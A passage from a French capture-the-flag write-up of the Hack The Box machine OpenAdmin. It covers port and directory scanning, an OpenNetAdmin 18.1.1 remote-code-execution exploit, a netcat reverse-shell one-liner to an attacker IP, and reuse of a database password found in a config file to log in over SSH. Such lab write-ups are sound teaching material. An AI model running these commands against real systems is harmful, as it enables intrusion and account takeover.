</table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">jimmy:n1nj4W4rri0R! </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sS -sC -sV -An -p22,80 -vvv 10.10.10.171 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET POST OPTIONS HEAD </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Apache2 Ubuntu Default Page: It works </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="dirsearch--openadminhtb">dirsearch : openadmin.htb </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ dirsearch -u http://openadmin.htb </span></span><span class="line"><span class="cl">/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html </span></span><span class="line"><span class="cl"> from pkg_resources import DistributionNotFound, VersionConflict </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _<span class="p">|</span>. _ _ _ _ _ _<span class="p">|</span>_ v0.4.3 </span></span><span class="line"><span class="cl"> <span class="o">(</span>_<span class="o">||</span><span class="p">|</span> _<span class="o">)</span> <span class="o">(</span>/_<span class="o">(</span>_<span class="o">||</span> <span class="o">(</span>_<span class="p">|</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extensions: php, aspx, jsp, html, js <span class="p">|</span> HTTP method: GET <span class="p">|</span> Threads: <span class="m">25</span> <span class="p">|</span> Wordlist size: <span class="m">11460</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Output File: /home/kali/htb/OpenAdmin/reports/http_openadmin.htb/_25-01-13_17-16-56.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target: http://openadmin.htb/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:57<span class="o">]</span> Starting: </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.ht_wsr.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccess.bak1 </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccess.orig </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccess.save </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccess.sample </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccess_extra </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccess_sc </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccessBAK </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccess_orig </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccessOLD </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htaccessOLD2 </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htm </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.html </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htpasswd_test </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.htpasswds </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:58<span class="o">]</span> <span class="m">403</span> - 278B - /.httr-oauth </span></span><span class="line"><span class="cl"><span class="o">[</span>17:16:59<span class="o">]</span> <span class="m">403</span> - 278B - /.php </span></span><span class="line"><span class="cl"><span class="o">[</span>17:17:24<span class="o">]</span> <span class="m">301</span> - 314B - /music -&gt; http://openadmin.htb/music/ </span></span><span class="line"><span class="cl"><span class="o">[</span>17:17:26<span class="o">]</span> <span class="m">301</span> - 312B - /ona -&gt; http://openadmin.htb/ona/ &lt;-------------------------- </span></span><span class="line"><span class="cl"><span class="o">[</span>17:17:32<span class="o">]</span> <span class="m">403</span> - 278B - /server-status </span></span><span class="line"><span class="cl"><span class="o">[</span>17:17:32<span class="o">]</span> <span class="m">403</span> - 278B - /server-status/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Task Completed </span></span></code></pre></td></tr></table> </div> </div><h3 id="ona---open-net-admin">ona - Open Net Admin </h3><p><a class="link" href="http://openadmin.htb/ona/" target="_blank" rel="noopener" >http://openadmin.htb/ona/</a></p> <p>&ldquo;You are NOT on the latest release version Your version = v18.1.1&rdquo;</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ searchsploit open net admin </span></span><span class="line"><span class="cl">------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">OpenNetAdmin 13.03.01 - Remote Code Execution <span class="p">|</span> php/webapps/26682.txt </span></span><span class="line"><span class="cl">OpenNetAdmin 18.1.1 - Command Injection Exploit <span class="o">(</span>Metasploit<span class="o">)</span> <span class="p">|</span> php/webapps/47772.rb </span></span><span class="line"><span class="cl">OpenNetAdmin 18.1.1 - Remote Code Execution <span class="p">|</span> php/webapps/47691.sh </span></span><span class="line"><span class="cl">SCO OpenServer 5.0.6 - lpadmin Buffer Overflow <span class="p">|</span> sco/dos/20735.txt </span></span><span class="line"><span class="cl">------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">Shellcodes: No Results </span></span></code></pre></td></tr></table> </div> </div><p>Voici un exploit python fonctionnel trouvé sur github: <a class="link" href="https://github.com/amriunix/ona-rce" target="_blank" rel="noopener" >https://github.com/amriunix/ona-rce</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python3 ona_exploit.py exploit http://openadmin.htb/ona </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">sh$ rm /tmp/f<span class="p">;</span>mkfifo /tmp/f<span class="p">;</span>cat /tmp/f<span class="p">|</span>sh -i 2&gt;<span class="p">&amp;</span>1<span class="p">|</span>nc 10.10.16.2 <span class="m">1337</span> &gt;/tmp/f </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.171<span class="o">]</span> <span class="m">45688</span> </span></span><span class="line"><span class="cl">sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#34;import pty;pty.spawn(&#39;</span>/bin/bash<span class="err">&#39;</span><span class="o">)</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@openadmin:/opt/ona/www</span>$<span class="s2"> export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s2">export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@openadmin:/opt/ona/www</span>$<span class="s2"> ^Z </span></span></span><span class="line"><span class="cl"><span class="s2">zsh: suspended nc -lnvp 1337 </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">┌──(kali㉿kali)-[~/htb/OpenAdmin] </span></span></span><span class="line"><span class="cl"><span class="s2">└─</span>$<span class="s2"> stty raw -echo; fg </span></span></span><span class="line"><span class="cl"><span class="s2">[1] + continued nc -lnvp 1337 </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">www-data@openadmin:/opt/ona/www</span>$<span class="s2"> whoami </span></span></span><span class="line"><span class="cl"><span class="s2">www-data </span></span></span></code></pre></td></tr></table> </div> </div><h3 id="mysql">mysql </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@openadmin:/opt/ona/www$ grep -ri <span class="s2">&#34;passwd&#34;</span> </span></span><span class="line"><span class="cl">plugins/ona_nmap_scans/install.php: mysql -u <span class="o">{</span><span class="nv">$self</span><span class="o">[</span><span class="s1">&#39;db_login&#39;</span><span class="o">]}</span> -p<span class="o">{</span><span class="nv">$self</span><span class="o">[</span><span class="s1">&#39;db_passwd&#39;</span><span class="o">]}</span> <span class="o">{</span><span class="nv">$self</span><span class="o">[</span><span class="s1">&#39;db_database&#39;</span><span class="o">]}</span> &lt; <span class="o">{</span><span class="nv">$sqlfile</span><span class="o">}</span>&lt;/font&gt;&lt;br&gt;&lt;br&gt; </span></span><span class="line"><span class="cl">include/functions_db.inc.php: <span class="nv">$ona_contexts</span><span class="o">[</span><span class="nv">$context_name</span><span class="o">][</span><span class="s1">&#39;databases&#39;</span><span class="o">][</span><span class="s1">&#39;0&#39;</span><span class="o">][</span><span class="s1">&#39;db_passwd&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$db_context</span><span class="o">[</span><span class="nv">$type</span><span class="o">]</span> <span class="o">[</span><span class="nv">$context_name</span><span class="o">]</span> <span class="o">[</span><span class="s1">&#39;primary&#39;</span><span class="o">]</span> <span class="o">[</span><span class="s1">&#39;db_passwd&#39;</span><span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl">include/functions_db.inc.php: <span class="nv">$ona_contexts</span><span class="o">[</span><span class="nv">$context_name</span><span class="o">][</span><span class="s1">&#39;databases&#39;</span><span class="o">][</span><span class="s1">&#39;1&#39;</span><span class="o">][</span><span class="s1">&#39;db_passwd&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$db_context</span><span class="o">[</span><span class="nv">$type</span><span class="o">]</span> <span class="o">[</span><span class="nv">$context_name</span><span class="o">]</span> <span class="o">[</span><span class="s1">&#39;secondary&#39;</span><span class="o">]</span> <span class="o">[</span><span class="s1">&#39;db_passwd&#39;</span><span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl">include/functions_db.inc.php: <span class="nv">$ok1</span> <span class="o">=</span> <span class="nv">$object</span>-&gt;PConnect<span class="o">(</span><span class="nv">$self</span><span class="o">[</span><span class="s1">&#39;db_host&#39;</span><span class="o">]</span>, <span class="nv">$self</span><span class="o">[</span><span class="s1">&#39;db_login&#39;</span><span class="o">]</span>, <span class="nv">$db</span><span class="o">[</span><span class="s1">&#39;db_passwd&#39;</span><span class="o">]</span>, <span class="nv">$self</span><span class="o">[</span><span class="s1">&#39;db_database&#39;</span><span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl">.htaccess.example:# You will need to create an .htpasswd file that conforms to the standard </span></span><span class="line"><span class="cl">.htaccess.example:# htaccess format, <span class="nb">read</span> the man page <span class="k">for</span> htpasswd. Change the </span></span><span class="line"><span class="cl">.htaccess.example:# AuthUserFile option below as needed to reference your .htpasswd file. </span></span><span class="line"><span class="cl">.htaccess.example:# names, however, <span class="k">do</span> need to be the same in both the .htpasswd and web </span></span><span class="line"><span class="cl">.htaccess.example: <span class="c1">#AuthUserFile /opt/ona/www/.htpasswd</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">===========================</span> </span></span><span class="line"><span class="cl">local/config/database_settings.inc.php: <span class="s1">&#39;db_passwd&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;n1nj4W4rri0R!&#39;</span>, </span></span><span class="line"><span class="cl"><span class="o">===========================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">winc/user_edit.inc.php: <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;passwd&#34;</span> </span></span><span class="line"><span class="cl">winc/user_edit.inc.php: <span class="k">if</span> <span class="o">(</span>!<span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;id&#39;</span><span class="o">]</span> and !<span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">])</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">winc/user_edit.inc.php: <span class="k">if</span> <span class="o">(</span><span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">])</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">winc/user_edit.inc.php: <span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">]</span> <span class="o">=</span> md5<span class="o">(</span><span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">])</span><span class="p">;</span> </span></span><span class="line"><span class="cl">winc/user_edit.inc.php: <span class="s1">&#39;passwd&#39;</span> <span class="o">=</span>&gt; <span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">]</span>, </span></span><span class="line"><span class="cl">winc/user_edit.inc.php: <span class="k">if</span> <span class="o">(</span>strlen<span class="o">(</span><span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">])</span> &lt; 32<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">winc/user_edit.inc.php: <span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="nv">$record</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl">winc/user_edit.inc.php: <span class="s1">&#39;passwd&#39;</span> <span class="o">=</span>&gt; <span class="nv">$form</span><span class="o">[</span><span class="s1">&#39;passwd&#39;</span><span class="o">]</span>, </span></span><span class="line"><span class="cl">winc/tooltips.inc.php:// Builds HTML <span class="k">for</span> changing tacacs <span class="nb">enable</span> passwd </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat database_settings.inc.php </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$ona_contexts</span><span class="o">=</span>array <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;DEFAULT&#39;</span> <span class="o">=</span>&gt; </span></span><span class="line"><span class="cl"> array <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;databases&#39;</span> <span class="o">=</span>&gt; </span></span><span class="line"><span class="cl"> array <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="nv">0</span> <span class="o">=</span>&gt; </span></span><span class="line"><span class="cl"> array <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;db_type&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;mysqli&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;db_host&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;localhost&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;db_login&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;ona_sys&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;db_passwd&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;n1nj4W4rri0R!&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;db_database&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;ona_default&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;db_debug&#39;</span> <span class="o">=</span>&gt; false, </span></span><span class="line"><span class="cl"> <span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;description&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;Default data context&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="s1">&#39;context_color&#39;</span> <span class="o">=</span>&gt; <span class="s1">&#39;#D3DBFF&#39;</span>, </span></span><span class="line"><span class="cl"> <span class="o">)</span>, </span></span><span class="line"><span class="cl"><span class="o">)</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><p>On ne trouve rien d&rsquo;intéressant dans la base de donnée mysql, cependant, le mot de passe fonctionne pour se connecter à l&rsquo;utilisateur <code>jimmy</code>:</p> <p><code>jimmy</code>:<code>n1nj4W4rri0R!</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@openadmin:/opt/ona/www$ su jimmy </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">jimmy@openadmin:/opt/ona/www$ whoami </span></span><span class="line"><span class="cl">jimmy </span></span></code></pre></td></tr></table> </div> </div><p>On peut aussi se connecter en ssh :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh jimmy@openadmin.htb </span></span><span class="line"><span class="cl">The authenticity of host <span class="s1">&#39;openadmin.htb (10.10.10.171)&#39;</span> can<span class="s1">&#39;t be established. </span></span></span><span class="line"><span class="cl"><span class="s1">ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo. </span></span></span><span class="line"><span class="cl"><span class="s1">This key is not known by any other names. </span></span></span><span class="line"><span class="cl"><span class="s1">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes </span></span></span><span class="line"><span class="cl"><span class="s1">Warning: Permanently added &#39;</span>openadmin.htb<span class="s1">&#39; (ED25519) to the list of known hosts. </span></span></span><span class="line"><span class="cl"><span class="s1">jimmy@openadmin.htb&#39;</span>s password: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Thu Jan <span class="m">2</span> 20:50:03 <span class="m">2020</span> from 10.10.14.3 </span></span><span class="line"><span class="cl">jimmy@openadmin:~$ whoami </span></span><span class="line"><span class="cl">jimmy </span></span></code></pre></td></tr></table> </div> </div><h2 id="jimmy---joanna">jimmy -&gt; joanna </h2><h3 id="internal--apache-service">internal : apache service </h3><p>On trouve un dossier &ldquo;internal&rdquo; avec du code php indiquant un autre serveur apache. Il s&rsquo;agit d&rsquo;une page de connexion avec un user &ldquo;jimmy&rdquo; et le hash de son mot de passe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">╔══════════╣ My user </span></span><span class="line"><span class="cl">╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>jimmy<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>jimmy<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>jimmy<span class="o">)</span>,1002<span class="o">(</span>internal<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p><code>index.php</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">(</span>isset<span class="o">(</span><span class="nv">$_POST</span><span class="o">[</span><span class="s1">&#39;login&#39;</span><span class="o">])</span> <span class="o">&amp;&amp;</span> !empty<span class="o">(</span><span class="nv">$_POST</span><span class="o">[</span><span class="s1">&#39;username&#39;</span><span class="o">])</span> <span class="o">&amp;&amp;</span> !empty<span class="o">(</span><span class="nv">$_POST</span><span class="o">[</span><span class="s1">&#39;password&#39;</span><span class="o">]))</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">(</span><span class="nv">$_POST</span><span class="o">[</span><span class="s1">&#39;username&#39;</span><span class="o">]</span> <span class="o">==</span> <span class="s1">&#39;jimmy&#39;</span> <span class="o">&amp;&amp;</span> hash<span class="o">(</span><span class="s1">&#39;sha512&#39;</span>,<span class="nv">$_POST</span><span class="o">[</span><span class="s1">&#39;password&#39;</span><span class="o">])</span> <span class="o">==</span> <span class="s1">&#39;00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1&#39;</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$_SESSION</span><span class="o">[</span><span class="s1">&#39;username&#39;</span><span class="o">]</span> <span class="o">=</span> <span class="s1">&#39;jimmy&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> header<span class="o">(</span><span class="s2">&#34;Location: /main.php&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span 